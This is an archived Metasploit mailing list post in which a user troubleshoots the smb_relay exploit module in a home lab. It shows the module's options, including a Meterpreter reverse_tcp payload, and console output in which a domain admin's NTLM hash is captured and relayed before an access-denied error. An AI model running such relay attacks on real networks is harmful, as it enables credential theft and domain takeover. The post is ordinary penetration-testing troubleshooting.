Metasploit mailing list archives
SMB_RELAY attacks still possible?
From: Brian S Traveling <epicdonk () gmail com>
Date: Fri, 24 Dec 2010 13:22:15 -0700
Hi, Is it possible to still carry out smb_relay attacks by specifying a different SMBHOST? It doesn't seem to be working for me... I was under the assumption it was still possible... my test environment: domain controller: 192.168.0.1 (also dhcp/router) windows 7 workstation: 192.168.0.2 (clicking the UNC path - joined to domain) metasploit box: 192.168.0.35 (not joined to domain) msf exploit(smb_relay) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SMBHOST 192.168.0.1 no The target SMB server (leave empty for originating system) SRVHOST 192.168.0.35 yes The local host to listen on. SRVPORT 445 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, none, process LHOST 192.168.0.35 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(smb_relay) > exploit [*] Exploit running as background job. [*] Started reverse handler on 192.168.0.35:4444 [*] Server started. msf exploit(smb_relay) > [*] Received 192.168.0.2:62573 MYDOMAIN\domainadmin LMHASH:000000000000000000000000000000000000000000000000 NTHASH:91fw9w155441a411b1a40edf8d7adlf70101000000000000a2cwcbd785a2cb020f640031811663700000000020000000000000000000000 OS: LM: [*] Authenticating to 192.168.0.1 as MYDOMAIN\domainadmin... [*] AUTHENTICATED as MYDOMAIN\domainadmin... [*] Connecting to the ADMIN$ share... [*] Error processing request from 192.168.0.2:62573 (115): Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0) /opt/metasploit3/msf3/lib/rex/proto/smb/client.rb:176:in `smb_recv_parse'/opt/metasploit3/msf3/lib/rex/proto/smb/client.rb:994:in `tree_connect'/opt/metasploit3/msf3/lib/rex/proto/smb/simpleclient.rb:253:in `connect'(eval):133:in `smb_haxor'(eval):530:in `smb_cmd_session_setup'(eval):332:in `smb_cmd_dispatch'/opt/metasploit3/msf3/lib/msf/core/exploit/smb.rb:716:in `smb_recv'/opt/metasploit3/msf3/lib/msf/core/exploit/smb.rb:647:in `on_client_data'/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:386:in `start_service'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:45:in `call'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:45:in `on_client_data'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:182:in `monitor_clients'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:180:in `each'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:180:in `monitor_clients'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:69:in `start'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `call'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `call'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `spawn'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `initialize'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `new'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `spawn'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:68:in `start'/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:393:in `start_service'/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:313:in `exploit'/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:201:in `job_run_proc'/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:148:in `run'/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in `call'/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in `start'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `call'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `call'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `spawn'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `initialize'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `new'/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `spawn'/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'/opt/metasploit3/msf3/lib/rex/job_container.rb:31:in `start'/opt/metasploit3/msf3/lib/rex/job_container.rb:155:in `start_bg_job'/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:145:in `run'/opt/metasploit3/msf3/lib/msf/base/simple/exploit.rb:125:in `exploit_simple'/opt/metasploit3/msf3/lib/msf/base/simple/exploit.rb:147:in `exploit_simple'/opt/metasploit3/msf3/lib/msf/ui/console/command_dispatcher/exploit.rb:154:in `cmd_exploit'/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:246:in `send'/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:246:in `run_command'/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:208:in `run_single'/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:202:in `each'/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:202:in `run_single'/opt/metasploit3/msf3/lib/rex/ui/text/shell.rb:143:in `run'/usr/local/bin/msfconsole:124/SMBRelay Thanks!
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- SMB_RELAY attacks still possible? Brian S Traveling (Dec 24)
- Re: SMB_RELAY attacks still possible? Epic (Dec 24)
- Re: SMB_RELAY attacks still possible? Kurt Grutzmacher (Dec 24)
- Re: SMB_RELAY attacks still possible? Epic (Dec 24)